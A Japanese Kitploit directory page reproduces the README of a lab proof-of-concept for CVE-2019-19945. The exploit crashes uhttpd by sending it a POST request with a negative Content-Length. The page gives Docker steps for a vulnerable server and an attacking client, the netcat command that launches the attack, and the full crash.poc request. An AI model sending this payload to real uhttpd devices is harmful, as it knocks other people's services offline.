Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-19945_Test — CVE-2019-19945 の概念実証エクスプロイト。負の Content-Length ヘッダーを持つ巧妙に細工された POST リクエストにより、uhttpd に対するサービス拒否攻撃を実証します。 | Kitploit
ツール/GitHubGitHub/delicatebyte/cve-2019-19945_test
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubdelicatebyte/cve-2019-19945_test

CVE-2019-19945_Test

CVE-2019-19945 の概念実証エクスプロイト。負の Content-Length ヘッダーを持つ巧妙に細工された POST リクエストにより、uhttpd に対するサービス拒否攻撃を実証します。

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-19945_Test

これは最初に提案されたCVEのコードです。

  1. Docker をインストール

  2. サーバーのビルド&実行 cd Server docker build -t server/cve . docker run -d --name server -p 80:80 server/cve

  3. サーバーコンテナのIPを取得 Linux sudo docker container inspect server | grep -i IPAddress Windows Powershell docker container inspect server | Select-String "IPAddress" IPを抽出し、クライアントビルドのコマンドに追加します。 ブラウザで localhost:80 にアクセスしてサーバーを確認できます。

  4. クライアントのビルド&実行 Client/Dockerfile の CMD をコメント解除すると、コンテナ起動時に攻撃が自動的に開始されます。 cd ../Client/ docker build --build-arg server_ip=<SERVER_IP> -t client/cve . docker run -d -p 8080:8080 client/cve

  5. CLient Docker にアタッチ docker container ls client/cve コンテナを見つけて && アタッチ docker exec -it /bin/sh

  6. 準備ができたら攻撃を開始 ./crash.sh

  7. サーバーは応答できなくなります。

コメント付きソースコード

エクスプロイトが非常に短いため、コメント付きのソースコードを提供する意味はありません。

エクスプロイトは、Netcat を使用して、サーバーの cgi-bin/ ディレクトリ内のファイルの処理に関して、ネガティブな大きな Content-Length を含む POST リクエストを送信することで構成されています。

実行は簡単な netcat スクリプトを使用して行われます。ここでは、サーバーの CGI-bin フォルダにある Crash というファイルを参照しています。 nc <SERVER_IP> < crash.poc

crash.poc

POST /cgi-bin/crash HTTP/1.0 Transfer-Encoding: chunked Content-Length: -100000

最大の課題は、古いバージョンの uhttpd を最新の Docker 環境で動作させることでした。

ツールをダウンロード